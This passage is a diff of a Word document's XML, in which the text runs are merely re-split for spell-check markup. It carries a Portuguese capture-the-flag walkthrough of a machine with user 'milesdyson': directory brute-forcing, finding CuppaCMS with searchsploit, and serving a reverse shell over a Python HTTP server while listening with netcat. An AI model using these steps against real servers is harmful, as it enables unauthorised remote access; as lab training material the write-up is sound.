+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/common.txt -</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>u  http</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>://&lt;ip_target&gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3458,18 +4692,55 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>que a página está executando o CuppaCM</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>. Então utilizar o searchsploit para procurar alguma falha.</w:t>
+        <w:t xml:space="preserve">que a página está executando o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>CuppaCM</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Então utilizar o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>searchsploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para procurar alguma falha.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -3575,7 +4846,31 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Então apenas falta escolher o único acessível e baixa-lo.</w:t>
+        <w:t xml:space="preserve">Então apenas falta escolher o único acessível e </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>baixa-lo</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3611,8 +4906,45 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> searchsploit Cuppa</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>searchsploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Cuppa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3647,7 +4979,79 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> searchsploit –m php/webapps/25971.txt</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>searchsploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –m </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>webapps</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/25971.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3792,30 +5196,126 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Lendo um pouco do exploit, você pode ver como utiliza-lo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Primeiro é preciso ter uma reverse shell baixada e edita-la </w:t>
+        <w:t xml:space="preserve">Lendo um pouco do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, você pode ver como </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>utiliza-lo</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Primeiro é preciso ter uma reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> baixada e </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>edita-la</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3895,18 +5395,116 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> usando python para poder baixar a shell dentro do servidor alvo.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Inicie dentro do diretório aonde esta a reverse shell)</w:t>
+        <w:t xml:space="preserve"> usando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>python</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para poder baixar a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dentro do servidor alvo.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Inicie dentro do diretório aonde </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>esta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3930,7 +5528,79 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Também é necessário criar um netcat para poder ouvir quando a shell for executada . </w:t>
+        <w:t xml:space="preserve">Também é necessário criar um </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para poder ouvir quando a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>executada .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4030,7 +5700,33 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>python3 -m http.server 80</w:t>
+        <w:t xml:space="preserve">python3 -m </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>http.server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 80</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4066,7 +5762,79 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> nc –lvnp &lt;port&gt;</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>lvnp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>port</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4397,7 +6165,29 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>/home/milesdyson/backups</w:t>
+        <w:t>/home/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Forte"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>milesdyson</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Forte"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/backups</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4494,7 +6284,55 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> dentro do diretório /var/www/html </w:t>
+        <w:t xml:space="preserve"> dentro do diretório /var/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>www</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
